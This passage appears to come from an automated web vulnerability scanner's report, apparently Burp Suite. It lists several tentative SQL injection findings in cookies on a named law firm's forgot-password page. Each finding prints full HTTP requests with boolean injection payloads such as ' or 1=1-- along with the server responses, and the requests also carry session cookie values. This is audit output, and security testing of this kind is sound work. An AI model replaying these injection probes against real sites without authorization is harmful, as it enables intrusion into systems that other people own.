Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312242310'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.51. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 16096722'%20or%201%3d1--%20 and 16096722'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.2.10.130522975816096722'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 19:51:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.2.10.130522975816096722'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.52. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 12161077%20or%201%3d1--%20 and 12161077%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704612161077%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 17:53:21 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704612161077%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.53. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 24015633'%20or%201%3d1--%20 and 24015633'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman24015633'%20or%201%3d1--%20; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 17:52:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman24015633'%20or%201%3d2--%20; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.54. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 46466794'%20or%201%3d1--%20 and 46466794'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4646466794'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 17:52:44 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4646466794'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.55. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 18225561'%20or%201%3d1--%20 and 18225561'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A2718225561'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 17:52:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
